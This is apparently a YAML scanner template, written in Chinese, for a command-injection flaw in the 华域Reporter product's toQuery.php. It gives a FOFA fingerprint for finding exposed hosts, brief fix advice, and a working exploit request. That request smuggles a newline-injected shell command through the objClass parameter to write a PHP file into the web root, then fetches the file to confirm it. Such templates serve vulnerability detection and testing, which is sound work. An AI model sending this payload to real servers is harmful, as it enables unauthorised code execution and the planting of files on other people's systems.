product: 华域Reporter
vName: 华域Reporter toQuery.php 命令注入
type: 命令执行
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: icon_hash="-1595726841"
protocol: http
link: https://www.freebuf.com/vuls/289293.html
fix:
  - 过滤用户传入的数据
  - 重写代码，创建白名单命令列表，避免使用objClass参数
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%2795cc64dd2825f9df13ec4ad683ecf339<?php%20phpinfo();?>%27%20>/var/www/reporter/view/Behavior/52e039302a62d077.php%0a
    verify:
      path: /view/Behavior/52e039302a62d077.php
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and